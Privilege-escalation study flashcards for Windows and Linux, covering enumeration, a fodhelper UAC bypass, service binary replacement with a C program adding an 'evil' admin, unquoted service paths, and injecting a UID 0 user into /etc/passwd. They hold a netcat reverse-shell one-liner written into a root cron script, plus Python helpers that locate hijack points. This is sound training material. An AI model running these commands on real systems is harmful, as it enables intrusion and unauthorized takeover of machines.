Privilege Escalation Flashcards
What is the process for enumerating users on a Windows machine?
- whoami
- net user
- - lists the local user accounts on the system (net users is accepted as an alias)
- net user <username>
- - gives additional information about a specific account, such as group memberships, last logon and password settings
What is the process for enumerating users on a Linux machine?
- whoami
- id
- cat /etc/passwd
- - enumerates other users on the system
How do you enumerate the Operating System Version and Architecture on a Windows machine?
c:> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
How do you enumerate the Operating System Version and Architecture on a Linux machine?
- cat /etc/issue
- cat /etc/*-release
- uname -a
How do you list running processes on a Windows machine?
tasklist /SVC
How do you list running processes on a Linux machine?
ps axu
How do you enumerate all TCP/IP network configurations on a Windows machine?
- ipconfig /all
- - interfaces, addresses, DNS and DHCP settings
- route print
- - the routing table (useful for spotting additional networks reachable from the host)
How do you enumerate all TCP/IP network configurations on a Linux machine?
- ifconfig
- ip a
- /sbin/route
- - the routing table
How do you list active network connections on a Windows machine?
netstat -ano
How do you list active network connections on a Linux machine?
- ss -anp
How do you enumerate firewall settings on a Windows system?
- netsh advfirewall show currentprofile
- netsh advfirewall firewall show rule name=all
How do we enumerate Scheduled Tasks on a Windows system?
- schtasks /query /fo LIST /v
How do we enumerate Scheduled Tasks on a Linux system?
- ls -lah /etc/cron*
- cat /etc/crontab
How do we enumerate Installed Applications on a Windows machine?
- wmic product get name, version, vendor
- - note: querying Win32_Product is slow and triggers a consistency check of every installed MSI package, which writes entries to the Application event log
How do we enumerate installed patches (hotfixes) on a Windows machine?
- wmic qfe get Caption, Description, HotFixID, InstalledOn
How do we enumerate Installed Applications on a Linux machine?
- dpkg -l
- - on Debian-based systems
On a Windows machine, how would you search for any file or directory in the Program Files directory that allows the 'Everyone' group 'write' permissions?
- accesschk.exe -uws "Everyone" "C:\Program Files"
- - -u suppresses errors, -w shows only objects that grant write access, -s recurses into subdirectories
What PowerShell cmdlet retrieves all permissions for a given file or directory?
Get-Acl
What additional cmdlet needs to be used with Get-Acl to run recursively?
Get-ChildItem
How would we use Get-Acl and Get-ChildItem cmdlets to get every file and directory under the Program Files directory that allows the ‘Everyone’ group to modify?
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
In Linux, how do you find every directory writable by the current user on the target system?
find / -writable -type d 2>/dev/null
How do you enumerate Unmounted Disks on a Windows machine?
- mountvol
How do we enumerate Unmounted Disks on a Linux machine?
- cat /etc/fstab
- mount
- /bin/lsblk
What are Device Drivers?
- A 'driver' is a software component that lets the operating system and a device communicate with each other.
In Windows, how can you enumerate Device Drivers and Kernel Modules?
- C:> powershell
- - PS C:> driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
In Windows, how can we get a list of Loaded Drivers?
- We can use the Get-WmiObject cmdlet to get the Win32_PnPSignedDriver WMI instances, which provide digital signature information about the drivers
- Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "VMware*"}
- - -like needs a wildcard; without the trailing * only a device named exactly "VMware" would match
How can we enumerate the Loaded Kernel Modules?
- lsmod
How can we find out more information about a specific Kernel Module in Linux? (Ex. 'libata' Kernel Module)
- /sbin/modinfo libata
On Windows systems, which registry setting should be checked, in which hives, for a "privesc shortcut"? Why and how?
- On Windows systems, we should check the status of the 'AlwaysInstallElevated' registry setting
- If this value is set to '1' (enabled) in both HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE, any user can run Windows Installer packages (.msi) with elevated (SYSTEM) privileges; the policy only takes effect when both hives are set
- We can use 'reg query' to check these settings:
- C:> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- C:> reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
In Linux, what should we search for to see if we can get files to run as the ‘root’ user? How is this located?
- SUID files
- if the SUID permission is set on a binary it will run with the permissions of the file owner
- if a binary has the SUID bit set and the file is owned by ‘root’, any local user will be able to execute that binary with elevated privileges
- find / -perm -u=s -type f 2>/dev/null
What is an automated tool to check for Windows privesc vulnerabilities? what command will provide all privesc vulns and groups?
- windows-privesc-check
- - C:> windows-privesc-check2.exe --dump -G
What is an automated tool to check for Linux privesc vulnerabilities?
- unix-privesc-check
How are privileges managed on Windows?
- Once a user is authenticated, Windows generates an access token that is assigned to that user
- The token contains various pieces of information that describe the security context of that user, including their privileges
- The token also carries the user's security identifier (SID) and the SIDs of the groups they belong to
In addition to privileges, what has Windows implemented to assign trust levels to application processes and securable objects? What are the levels?
- Integrity Levels
- This describes the level of trust the operating system has in running applications or securable objects
- The configured Integrity Level dictates what actions an application can perform, including the ability to read or write to the local file system
- There are four Integrity Levels:
- System Integrity Process: System rights
- High Integrity Process: Administrative rights
- Medium Integrity Process: Standard user rights
- Low Integrity Process: very restricted rights often used in sandboxed processes
What Windows command displays Integrity Levels in action?
- c:> whoami /groups
- - the 'Mandatory Label' line (e.g. 'Mandatory Label\High Mandatory Level') shows the integrity level of the current process
What access tokens does an administrative user have, and what mechanism acts as a separation between those two integrity levels?
- The administrative user's logon produces two access tokens:
- - a filtered, medium integrity level token, used by default
- - a full, high integrity level token, used only after elevation
- UAC acts as the separation mechanism between those two integrity levels
Explain UAC
- User Account Control
- Forces applications and tasks to run in the context of a non-administrative account until an Administrator authorizes elevated access
- UAC will block installers and unauthorized applications from running without the permissions of an administrative account
- Two UAC prompt types:
- credential prompt
- consent prompt
When does a UAC Credential Prompt get triggered?
- When a standard user wishes to perform an administrative task, such as installing a new application
- The credentials of an Administrative User will be required to complete the install
When does a UAC Consent Prompt get triggered?
- When an administrative user wishes to perform an administrative task
- The administrative user simply has to confirm that the task should be completed
Why would an administrative user be blocked from changing a password in a cmd prompt?
- Because UAC is enabled and the cmd window is running with the administrative user's medium integrity (filtered) token, so the operation fails with 'Access is denied' until it is run from an elevated prompt
Describe the UAC bypass exploit used in these notes
- Demonstrated on Windows 10 build 1709
- Leverages a UAC bypass based on fodhelper.exe, a Microsoft-signed binary that auto-elevates
- This application is launched whenever a local user selects the "Manage optional features" option in the "Apps & Features" Windows Settings screen
- C:> C:\Windows\System32\fodhelper.exe
How can you get information about an application, such as the permissions it requires to run and whether it auto-elevates privileges?
- The Application Manifest is an XML file embedded in the executable that tells the operating system how to handle the program when it is started.
- We can inspect the manifest with the 'sigcheck' utility from Sysinternals
- C:> cd C:\Tools\Privilege_escalation\SysinternalsSuite
- C:\Sysin..> sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe
When viewing the Application Manifest for an application, how do you know if the executable can auto-elevate to ‘high integrity’ w/o UAC prompt?
- the ‘autoElevate’ flag is set to ‘True’
How do you use Procmon to analyze an application such as ‘fodhelper.exe’?
- Run procmon.exe (sysinternals)
- Filter on process named ‘fodhelper.exe’
- Run ‘fodhelper.exe’
- Filter on 'Result' value of 'NAME NOT FOUND', which shows 'fodhelper.exe' attempting to access registry keys that do not exist.
- Focus on registry keys that we, as the current user, can control (HKEY_CURRENT_USER, HKCU); filter on 'Path' contains 'HKCU'
- We see that 'fodhelper.exe' is trying to access the HKCU\Software\Classes\ms-settings\Shell\Open\command registry key, which does not exist yet.
Explain the 'fodhelper.exe' exploit
- fodhelper.exe attempts to open 'HKCU\Software\Classes\ms-settings\Shell\Open\command' but gets a 'NAME NOT FOUND' result (procmon)
- When that fails, it falls back to the same key under HKEY_CLASSES_ROOT (the per-machine defaults)
- Since HKCU is checked first and is writable by us, we create the key there:
- - C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
- Rerunning 'fodhelper.exe' in procmon, we see it now tries to query a value named 'DelegateExecute' under that key
- Next, we add an empty 'DelegateExecute' value:
- - C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
- Now 'fodhelper.exe' gets a SUCCESS result (procmon), finds the new 'DelegateExecute' entry, and then reads the (Default) value, which is still empty
- Finally, we set the (Default) value to cmd.exe:
- - C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
- Running 'fodhelper.exe' now spawns a cmd shell with the high-integrity token, and we have bypassed UAC
- Remove the HKCU\Software\Classes\ms-settings key afterwards so the hijack does not persist for the next auto-elevating launch
How can you make a Registry entry execute a program, such as cmd.exe?
- Create the 'DelegateExecute' value with an empty REG_SZ string, then set the key's (Default) value to the command to run
- With DelegateExecute present but empty, the shell falls back to the (Default) command line and executes it
- C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
- C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
How are Insecure File Permissions exploited?
- Program runs as a Windows service
- During install, the program receives full read write access to all members of the Everyone group
- The program is replaced with a malicious file
- The service is restarted and the malicious file is executed with SYSTEM privileges
What is a directory to look in for possible Insecure File Permission exploits?
- Program Files
- These services are user-installed, and have a potential to be installed with elevated privileges
What PowerShell one-liner lists the names of 'running' services and the path of their executables?
PS C:> Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
What is ‘icacls’?
- Windows utility that outputs the Security Identifiers (SIDs) followed by a permission mask
- C:> icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
What are the ‘icacls’ permission masks?
- F = Full Access
- M = Modify Access
- RX = Read and execute access
- R = Read-only access
- W = Write-only access
After running 'icacls' on ServiioService.exe, you see it has the following permission entry; what can you do to exploit this?
- BUILTIN\Users:(I)(F)
- Every local user (BUILTIN\Users) has Full Access to the service binary
- We can replace ServiioService.exe with our own malicious binary
- We can then restart the service (or reboot) so the service control manager executes our binary with the service's privileges (SYSTEM)
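Added example (not part of the original notes): a Python helper that applies the icacls check above to captured output instead of reading it by eye. Feed it the service list from the Get-WmiObject one-liner (the exe path taken from PathName with quotes stripped) and the text of icacls <exe> for each binary; it parses each principal:(flags)(mask) entry, ignores inheritance flags and DENY entries, and reports binaries where a principal every user belongs to holds F, M or W. The service names, the icacls text and the LOW_PRIV_PRINCIPALS set are constructed sample data and assumptions, not output from the notes' target.

```python
import re
from typing import Dict, List, Tuple

# Principals every local or authenticated user belongs to (assumption: extend per environment).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
}
WRITE_MASKS = {"F", "M", "W"}                  # simple rights that let us overwrite or replace the file
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}  # inheritance flags icacls prints before the rights

_ENTRY_RE = re.compile(r"^(?P<principal>[^:]+):(?P<flags>(?:\([^)]*\))+)$")


def parse_icacls(path: str, output: str) -> List[Tuple[str, List[str]]]:
    """Parse the text printed by `icacls <path>` into (principal, [flag groups]) pairs.

    The first line repeats the path in front of the first ACE, so it is stripped off.
    Inheritance flags such as (I) or (OI)(CI) are dropped; (DENY) is kept so callers can honour it.
    """
    entries = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = _ENTRY_RE.match(line)
        if not m:
            continue
        groups = re.findall(r"\(([^)]*)\)", m.group("flags"))
        rights = [g for g in groups if g not in INHERIT_FLAGS]
        entries.append((m.group("principal").strip(), rights))
    return entries


def writable_by_low_priv(entries: List[Tuple[str, List[str]]]) -> List[Tuple[str, List[str]]]:
    """Return [(principal, [write masks])] for low-privileged principals allowed to modify the file."""
    hits = []
    for principal, rights in entries:
        if principal.lower() not in LOW_PRIV_PRINCIPALS or "DENY" in rights:
            continue
        granted = {r for group in rights for r in group.split(",")}  # (R,W) -> {"R", "W"}
        masks = sorted(granted & WRITE_MASKS)
        if masks:
            hits.append((principal, masks))
    return hits


def audit_services(services: List[Tuple[str, str, str]], icacls_outputs: Dict[str, str]):
    """services: [(name, state, exe path)]; icacls_outputs: {exe path: captured icacls text}.

    Returns [(service, exe, [(principal, masks)])] for binaries a low-privileged user can replace.
    """
    findings = []
    for name, _state, exe in services:
        output = icacls_outputs.get(exe)
        if output is None:
            continue
        hits = writable_by_low_priv(parse_icacls(exe, output))
        if hits:
            findings.append((name, exe, hits))
    return findings


# Constructed sample data shaped like the Get-WmiObject listing and `icacls` output in the notes.
SAMPLE_SERVICES = [
    ("Serviio", "Running", r"C:\Program Files\Serviio\bin\ServiioService.exe"),
    ("Spooler", "Running", r"C:\Windows\System32\spoolsv.exe"),
]
SAMPLE_ICACLS = {
    r"C:\Program Files\Serviio\bin\ServiioService.exe": "\n".join([
        r"C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)",
        r"                                                 NT AUTHORITY\SYSTEM:(I)(F)",
        r"                                                 BUILTIN\Administrators:(I)(F)",
        "",
        "Successfully processed 1 files; Failed processing 0 files",
    ]),
    r"C:\Windows\System32\spoolsv.exe": "\n".join([
        r"C:\Windows\System32\spoolsv.exe NT AUTHORITY\SYSTEM:(I)(F)",
        r"                                BUILTIN\Administrators:(I)(F)",
        r"                                BUILTIN\Users:(I)(RX)",
        "",
        "Successfully processed 1 files; Failed processing 0 files",
    ]),
}

if __name__ == "__main__":
    for service, exe, hits in audit_services(SAMPLE_SERVICES, SAMPLE_ICACLS):
        for principal, masks in hits:
            print(f"{service}: {principal} has {','.join(masks)} on {exe}")
```

Only the Serviio binary is reported: spoolsv.exe grants BUILTIN\Users RX, which is not enough to replace the file. Extend LOW_PRIV_PRINCIPALS with any group your current user belongs to (whoami /groups) before trusting a clean result.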
How would you create a malicious binary file named 'adduser.exe' that creates a user named 'evil' and adds this user to the 'administrators' group?
How would you replace the existing ServiioService.exe with 'adduser.exe'?
How would you get 'adduser.exe' to execute?
1. Create a C file 'adduser.c' with the following code:
#include <stdlib.h>

int main(void)
{
    int i;
    /* both commands run with the privileges of the service that launches us (SYSTEM) */
    i = system("net user evil Ev!lpass /add");
    i = system("net localgroup administrators evil /add");
    return 0;
}
2. Cross-compile the code on our Kali machine with 'i686-w64-mingw32-gcc', using -o to specify the name of the compiled output:
- kali:~$ i686-w64-mingw32-gcc adduser.c -o adduser.exe
3. Transfer 'adduser.exe' to our target and replace 'ServiioService.exe' (keeping the original so the service can be restored afterwards):
- C:> move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
- C:> move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
4. Restart the Serviio service
- C:> net stop Serviio
- C:> net start Serviio
In Windows, how can we tell if a service (ex. Serviio) will start again after a reboot?
- If the 'startmode' value is 'Auto' it will automatically start on reboot
- C:> wmic service where caption="Serviio" get name, caption, state, startmode
In Windows, how can you tell if your user has permission to reboot the system?
- If the user has the privilege ‘SeShutdownPrivilege’
- - C:> whoami /priv
In Windows, how to you reboot the system?
C:> shutdown /r /t 0
When do you try to take advantage of Unquoted Service Paths?
- when we have write permissions to a service’s main directory and subdirectories, but cannot replace files within them
- Each Windows service maps to an executable file that will be run when the service is started.
- Most of the time, services that accompany third party software are stored under the C:\Program Files directory
Exploiting Unquoted Service Paths
- when using file or directory paths that contain spaces, the developers should always ensure that they are enclosed by quotation marks
- this ensures that they are explicitly declared
- However, when this is not the case and a path is unquoted, it is open to interpretation
- Specifically, in the case of executable paths, anything that comes after each whitespace character will be treated as a potential argument or option for the executable
How will Windows attempt to run the executable service.exe from the path C:\Program Files\My Program\My Service\service.exe?
- C:\Program.exe
- C:\Program Files\My.exe
- C:\Program Files\My Program\My.exe
- C:\Program Files\My Program\My Service\service.exe
How would you try to exploit the Unquoted Service Path vulnerability in the path C:\Program Files\My Program\My Service\service.exe? What would be the ideal outcome?
- Place a malicious executable named 'My.exe' in either the 'C:\Program Files' directory or the 'C:\Program Files\My Program' directory (or 'Program.exe' in C:\, which is rarely writable); these are the locations Windows searches before it reaches the real service.exe
- The ideal outcome is that when the service starts, it executes the malicious 'My.exe' with the same privileges the service starts with
- Often, these privileges are the NT AUTHORITY\SYSTEM account, which would result in a successful privilege escalation
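Added example (not part of the original notes) that generalises the search order shown above: given service PathName values (as returned by wmic service get name,pathname,startname), it decides whether a path is unquoted and contains spaces, lists the candidates CreateProcess will try before the real file, and cross-references each candidate's directory with the directories you already found writable (from icacls or accesschk). The service list and the writable-directory set are constructed sample data; the helper names are my own.

```python
import ntpath
import re
from typing import List, Set, Tuple


def executable_of(pathname: str) -> Tuple[str, bool]:
    """Return (exe, quoted) from a service PathName that may be quoted and carry arguments."""
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return (p[1:end] if end > 0 else p[1:]), True
    m = re.match(r"(.+?\.exe)", p, re.IGNORECASE)  # unquoted: take everything up to the first .exe
    return (m.group(1) if m else p), False


def search_order(exe: str) -> List[str]:
    """Paths CreateProcess tries, in order, for an unquoted executable path containing spaces.

    Every space is a possible end of the program name; a prefix without an extension gets ".exe"
    appended. The real file is always last, so everything before it is a hijack candidate.
    """
    parts = exe.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    candidates.append(exe)
    return candidates


def hijack_points(exe: str) -> List[Tuple[str, str]]:
    """(directory that must be writable, file name to plant) for each candidate tried before the real one."""
    return [(ntpath.dirname(c), ntpath.basename(c)) for c in search_order(exe)[:-1]]


def audit_unquoted(services: List[Tuple[str, str, str]], writable_dirs: Set[str]):
    """services: [(name, pathname, start_name)]; writable_dirs: directories the current user can write to.

    Returns [(service, start_name, directory, filename)]: dropping `filename` into `directory`
    makes the service start our binary as `start_name` instead of its real executable.
    """
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    findings = []
    for name, pathname, start_name in services:
        exe, quoted = executable_of(pathname)
        if quoted or " " not in exe:
            continue  # quoted, or no spaces: nothing to hijack
        for directory, filename in hijack_points(exe):
            if directory.lower().rstrip("\\") in writable:
                findings.append((name, start_name, directory, filename))
    return findings


# Constructed sample data: three PathName values and one directory we found writable with icacls.
SAMPLE_SERVICES = [
    ("MyService", r"C:\Program Files\My Program\My Service\service.exe", "LocalSystem"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "LocalSystem"),
    ("OtherApp", r'"C:\Program Files\Other App\app.exe" -run', "LocalSystem"),
]
SAMPLE_WRITABLE_DIRS = {r"C:\Program Files\My Program"}

if __name__ == "__main__":
    for candidate in search_order(SAMPLE_SERVICES[0][1]):
        print("tries:", candidate)
    for service, runs_as, directory, filename in audit_unquoted(SAMPLE_SERVICES, SAMPLE_WRITABLE_DIRS):
        print(f"{service} ({runs_as}): plant {filename} in {directory}")
```

The search order reproduces the four candidates listed above, and only the MyService entry is reported, because the one writable directory is C:\Program Files\My Program and the file to plant there is My.exe, not anything under My Service.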
What is something important to keep in mind when exploiting Windows Kernel vulnerabilities?
- When attempting to exploit system-level software (such as drivers or the kernel itself), we must pay careful attention to several factors:
- the target’s OS
- version
- architecture
- Failure to accurately identify these factors can trigger a BSOD
What attack surface should be investigated first when attempting to exploit Windows Kernel vulnerabilities?
- Third-party driver exploits are more common, and as such, we should always attempt to investigate this attack surface first
- Native kernel vulnerabilities are less common and more difficult to exploit
What command displays the Windows OS version and architecture?
- C:> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
What command displays the Windows OS drivers?
- C:> driverquery /v
- - this output consists of both Microsoft-installed drivers and third party drivers
If you are trying to get version information about a driver such as USBPcap, what command should you use?
- C:> type USBPcap.inf
How do we enumerate Windows Kernel vulnerabilities?
1. Find the OS version and architecture
- C:> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
2. Enumerate the drivers that are installed on the system
- C:> driverquery /v
3. Query 'searchsploit' for any exploits for the third party drivers discovered, looking specifically for exploits that match the driver version number
4.
What programming language are most exploits that target kernel-level vulnerabilities written in?
How does this impact exploit development?
- the vast majority of exploits targeting kernel-level vulnerabilities are written in a low-level programming language such as C or C++
- therefore, exploits must be compiled
- ideally, we want to compile code on the platform version we are attacking, and should spin up a VM that matches our target, and compile the code there
- However, we can also cross-compile the code on an operating system entirely different from the one we are targeting
If our target Windows machine has 'mingw-w64.bat' installed, how can we create an executable compiled to run on this machine? Assume the example exploit is '41542.c'
- Run the 'mingw-w64.bat' script, which sets up the PATH environment variable for the 'gcc' executable
- - C:> mingw-w64.bat
- Run gcc to make sure it is working properly
- - C:> gcc -help
- Transfer the exploit code to the Windows client and compile it
- - C:> gcc 41542.c -o exploit.exe
- - the compiler may print warnings, but the build still succeeds
- Run the compiled executable
What characteristics of a file on a Linux system do we look for to exploit Insecure File Permissions?
- an executable file
- allows us write access
- runs at an elevated privilege level
What is a prime target on Linux systems for exploiting Insecure File Permissions?
- the ‘cron’ time-based job scheduler
- system-level jobs are executed with root user privileges and system admins often create scripts for cron jobs with insecure permissions
Where should we look for installed cron jobs on a Linux system?
- ls -lah /etc/cron*
- cat /etc/crontab
- grep “CRON” /var/log/cron.log
Given a CRON job that executes a script '/var/scripts/user_backups.sh' with root privileges, how would we determine if local (low-privileged) users have write permissions to the script?
- ls -lah /var/scripts/user_backups.sh
- - look at the group and "other" permission bits; rwxrwxrwx means any user can edit the script that root executes
What is the reverse shell one-liner to add to scripts in linux when exploiting Insecure File permissions?
- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| /bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f
- rm /tmp/f = removes any existing named pipes
- mkfifo /tmp/f = creates a named pipe
- cat /tmp/f|/bin/sh -i = creates an interactive shell on the local machine and hooks the output of the pipe to the shell’s input
- 2>&1|nc 10.11.0.4 1234 = takes the output of the shell and sends it over the network to a machine listening on port 1234 at 10.11.0.4
- > /tmp/f = takes the output of ‘nc’ and sends it to the named pipe’s input, where it becomes input for the shell
Given an existing script ‘user_backups.sh’, how would you write a reverse shell one-liner to it so it will connect to an attacking machine at 10.11.0.4 on 1234 when ‘user_backups.sh’ is run by the CRON job?
- echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| /bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f" >> user_backups.sh
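Added example (not part of the original notes): a Python check that automates the two cron questions above, parsing /etc/crontab in system format (minute hour dom month dow user command) and the ls -l output for the scripts it references, then reporting root jobs whose script the current user can edit through the world-writable, group-writable or owner bits. The crontab and ls output are constructed sample data, and current_user / current_groups are assumptions you would replace with the values from id.

```python
import shlex
from typing import Dict, List, Tuple


def cron_jobs(crontab_text: str) -> List[Tuple[str, List[str]]]:
    """Parse system crontab lines (m h dom mon dow user command) into (user, [absolute paths in command]).

    Blank lines, comments and VAR=value lines are skipped; @reboot-style lines are handled.
    Tokens after a pipe or redirection are ignored, since they are not the executed script.
    """
    jobs = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue
        if line.startswith("@"):
            fields = line.split(None, 2)  # @reboot user command
            if len(fields) < 3:
                continue
            user, command = fields[1], fields[2]
        else:
            fields = line.split(None, 6)  # five time fields, user, command
            if len(fields) < 7:
                continue
            user, command = fields[5], fields[6]
        try:
            tokens = shlex.split(command)
        except ValueError:  # unbalanced quotes in the command: fall back to whitespace split
            tokens = command.split()
        paths = []
        for tok in tokens:
            if tok[0] in "|><;&":
                break
            if tok.startswith("/") and len(tok) > 1:
                paths.append(tok)
        jobs.append((user, paths))
    return jobs


def file_modes(ls_output: str) -> Dict[str, Tuple[str, str, str]]:
    """Parse `ls -l` lines into {path: (mode string, owner, group)}."""
    modes = {}
    for raw in ls_output.splitlines():
        parts = raw.split(None, 8)
        if len(parts) == 9 and parts[0][0] in "-dl":
            modes[parts[8]] = (parts[0][:10], parts[2], parts[3])
    return modes


def audit_cron(crontab_text: str, ls_output: str,
               current_user: str = "www-data", current_groups=("www-data",)) -> List[Tuple[str, str]]:
    """Report scripts run by root from cron that the current low-privileged user can modify."""
    modes = file_modes(ls_output)
    findings = []
    for user, paths in cron_jobs(crontab_text):
        if user != "root":
            continue
        for path in paths:
            if path not in modes:
                continue
            mode, owner, group = modes[path]
            reasons = []
            if mode[8] == "w":                              # o+w: anyone can edit it
                reasons.append("world-writable")
            if mode[5] == "w" and group in current_groups:  # g+w and we are in that group
                reasons.append(f"group-writable ({group})")
            if mode[2] == "w" and owner == current_user:    # we own the file root executes
                reasons.append(f"owned by {owner}")
            if reasons:
                findings.append((path, ", ".join(reasons)))
    return findings


# Constructed sample input shaped like /etc/crontab and `ls -lah` on the referenced scripts.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *       root    /var/scripts/user_backups.sh > /dev/null 2>&1
*/10 * * * *    root    /usr/bin/python3 /opt/app/cleanup.py
@reboot         www-data /var/www/warmup.sh
"""
SAMPLE_LS = """\
-rwxrwxrwx 1 root root   52 Mar  1 12:00 /var/scripts/user_backups.sh
-rwxr-xr-x 1 root root  410 Mar  1 12:00 /opt/app/cleanup.py
-rwxr-xr-x 1 root root 1234 Mar  1 12:00 /usr/bin/python3
-rwxrwxr-x 1 www-data www-data 90 Mar  1 12:00 /var/www/warmup.sh
"""

if __name__ == "__main__":
    for path, why in audit_cron(SAMPLE_CRONTAB, SAMPLE_LS):
        print(f"{path}: {why} (root runs it every minute; append the reverse shell one-liner here)")
```

Only /var/scripts/user_backups.sh is reported: cleanup.py and the interpreter are root-owned 755, and warmup.sh is writable but runs as www-data, not root, so overwriting it gains nothing.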
How can /etc/passwd be used to exploit Insecure File Permissions in Linux?
- On modern Linux systems password hashes are stored in /etc/shadow, and the second field of each /etc/passwd record holds an 'x' as a placeholder
- Historically the hash lived in the second field of /etc/passwd itself, and that format is still honoured
- If a password hash is present in the second field of an /etc/passwd user record, it is considered valid for authentication and takes precedence over the respective entry in /etc/shadow
- This means that if we can write to the /etc/passwd file, we can effectively set an arbitrary password for any account, or add a new account with UID 0
On Linux, what algorithm is used to generate password hashes?
- the crypt(3) algorithm; the prefix of the hash selects the scheme ($1$ MD5, $5$ SHA-256, $6$ SHA-512, or no prefix for legacy DES), and any of them is accepted in /etc/passwd or /etc/shadow
Give an example of how to exploit Insecure File Permissions in Linux by creating a root user named 'root2' that is part of the 'root' group
- Generate the password hash for 'evil'
- - openssl passwd evil
- Write the generated password hash to the /etc/passwd file for the user 'root2' with UID 0 and GID 0 (the 'root' group)
- - echo "root2:AD24fcSx2Il3I:0:0:root:/root:/bin/bash" >> /etc/passwd
- Then switch to the new account with su, supplying 'evil' as the password
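Added example (not part of the original notes): a Python helper for the /etc/passwd technique above. passwd_entry builds the seven-field record the echo command appends, and audit_passwd is the check a defender (or an attacker verifying their own work) runs against the file to spot extra UID 0 accounts and real hashes in the second field. The sample /etc/passwd is constructed; the hash is the one the notes obtained from openssl passwd evil, reused here because Python's crypt module is deprecated and removed from recent versions.

```python
from typing import List, Tuple

ROOT_HOME, ROOT_SHELL = "/root", "/bin/bash"


def passwd_entry(user: str, crypt_hash: str, uid: int = 0, gid: int = 0,
                 gecos: str = "root", home: str = ROOT_HOME, shell: str = ROOT_SHELL) -> str:
    """Build the seven-field /etc/passwd record the notes append.

    A hash in field 2 is used directly for authentication and takes precedence over
    /etc/shadow; uid 0 / gid 0 make the account root-equivalent.
    """
    if ":" in user or ":" in crypt_hash:
        raise ValueError("fields must not contain ':'")
    return ":".join([user, crypt_hash, str(uid), str(gid), gecos, home, shell])


def audit_passwd(text: str) -> List[Tuple[str, str]]:
    """Flag the records that matter when checking /etc/passwd for tampering:
    extra UID 0 accounts, real hashes in field 2 (should be 'x'), empty passwords, malformed lines."""
    findings = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((raw, "malformed record"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((user, "extra UID 0 account"))
        if pw == "":
            findings.append((user, "empty password field"))
        elif pw != "x" and not pw.startswith(("!", "*")):  # '!' and '*' mark locked accounts
            findings.append((user, "password hash stored in /etc/passwd"))
    return findings


# Constructed sample /etc/passwd; EVIL_HASH is the DES-crypt hash of 'evil' from the notes.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
student:x:1000:1000:student:/home/student:/bin/bash
"""
EVIL_HASH = "AD24fcSx2Il3I"


def after_injection() -> str:
    """/etc/passwd contents after the `echo ... >> /etc/passwd` step from the notes."""
    return SAMPLE_PASSWD + passwd_entry("root2", EVIL_HASH) + "\n"


if __name__ == "__main__":
    print(passwd_entry("root2", EVIL_HASH))
    for user, why in audit_passwd(after_injection()):
        print(f"{user}: {why}")
```

The clean sample produces no findings; after the injected line, root2 is reported twice, once for the duplicate UID 0 and once for the hash sitting in /etc/passwd. Either signal on a real host is worth an incident ticket, since neither appears in a correctly maintained file.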
What are the commands you should run to enumerate kernel vulnerabilities on a Linux machine?
- cat /etc/issue
- uname -r
- searchsploit linux kernel
- - EX: searchsploit linux kernel Ubuntu 16.04
Given the exploit '43418.c' how would you compile it to run on Linux?
- gcc 43418.c -o exploit